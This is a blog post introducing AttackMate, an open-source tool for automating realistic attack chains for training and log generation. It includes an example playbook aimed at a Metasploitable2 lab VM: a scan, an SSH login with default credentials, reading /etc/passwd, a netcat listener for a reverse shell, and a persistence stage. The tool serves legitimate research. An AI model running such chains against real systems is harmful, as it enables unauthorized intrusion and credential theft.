Automating attack chains is not only necessary for testing cybersecurity mechanisms, but also very practical for cybersecurity training and pentests. Most existing tools are not primarily concerned with having the attacks show up in the logs as if a human attacker had carried them out. AttackMate was written with the intention of performing realistic attacks, and it allows attacks to be chained across all phases of the killchain. I wrote that tool as part of my work at the AIT, where we need realistic logs for anomaly detection. It is Free Open Source Software and available on GitHub.
Features
The primary features of AttackMate are:
- Portable playbooks
- Reproducible attack chains
- Developer-friendly
- Uses well known exploits
- Real malware (Sliver)
- Usable for every phase of the killchain
- Full support for Metasploit
- Split playbooks into separate parts with the include command
- Unix philosophy: use the output of one command as the input of another
- Logging (including metadata)
- Commands in background mode
- Support for interactive commands
- SSH/SCP
- Shell Command
- ...and many more
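To make the feature list concrete, here is a small playbook showing how several of these features combine into one chain: a shell command, a regex that turns the output of that command into a variable for the next one, an SSH session that is created once and reused, a command left running in background mode, and an include that pulls in a separately maintained stage. This is an added illustration, not a playbook from the AttackMate repository. The target address and the msfadmin credentials are assumptions (the Metasploitable2 defaults), the included file is hypothetical, and the command keys follow the AttackMate documentation as I read it; check them against the current schema before running, since it evolves.

```yaml
###
# Added example playbook; not from the AttackMate repository.
vars:
  $TARGET: 192.168.56.101      # assumed address of a Metasploitable2 VM
  $USER: msfadmin              # Metasploitable2 default credentials (assumption)
  $PASS: msfadmin

commands:
  # Recon with a plain shell command. Its stdout is available to the
  # next command as $RESULT_STDOUT.
  - type: shell
    cmd: nmap -sV -p 21,22,80 $TARGET

  # Unix philosophy: feed the previous output into a regex and store
  # the SSH port in a variable instead of hard-coding it.
  - type: regex
    cmd: "(\\d+)/tcp\\s+open\\s+ssh"
    input: RESULT_STDOUT
    output:
      SSH_PORT: "$MATCH_0"

  - type: debug
    cmd: "SSH found on port $SSH_PORT"

  # Open an SSH session once and give it a name...
  - type: ssh
    cmd: id
    hostname: $TARGET
    port: $SSH_PORT
    username: $USER
    password: $PASS
    creates_session: "target_ssh"

  # ...then reuse it, so the logs show one login followed by
  # several commands, as a human operator would produce.
  - type: ssh
    cmd: "cat /etc/passwd"
    session: "target_ssh"

  # Background mode: start a local listener without blocking the chain.
  - type: shell
    cmd: "nc -lvnp 4444"
    background: True

  # Include: the next stage lives in its own file (hypothetical path).
  - type: include
    local_path: ./stages/persistence.yml
```

The point of the regex step is that nothing in the later commands depends on a value typed in by hand: if the SSH service were moved to another port, the chain still works and the resulting logs still look like a single attacker working through the host.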
Getting Started
The AttackMate documentation explains how to install and prepare AttackMate, and it also includes some example playbooks that can be run against the Metasploitable2 VM.
Talks about AttackMate
I gave talks about AttackMate at the BalCCon2k24 and IT-S Now conferences. Feel free to watch them for a deeper understanding of what AttackMate is:
BalCCon2k24
IT-S Now
Further Information
In this blog post I just introduced AttackMate and gave an overview of its features. For more detailed information I would recommend checking out the GitHub repository and the AttackMate documentation.